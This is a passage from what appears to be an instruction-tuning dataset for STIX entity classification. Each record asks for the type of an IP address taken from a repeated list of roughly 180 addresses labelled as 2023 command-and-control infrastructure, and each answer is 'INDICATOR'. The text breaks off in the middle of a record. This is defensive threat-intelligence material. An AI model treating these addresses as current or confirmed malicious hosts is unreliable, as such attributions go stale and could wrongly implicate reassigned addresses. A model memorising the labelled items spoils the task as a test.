"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n159.223.23.23\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n165.227.76.84\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n178.128.231.180\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.95.232.74\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n165.232.165.42\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with 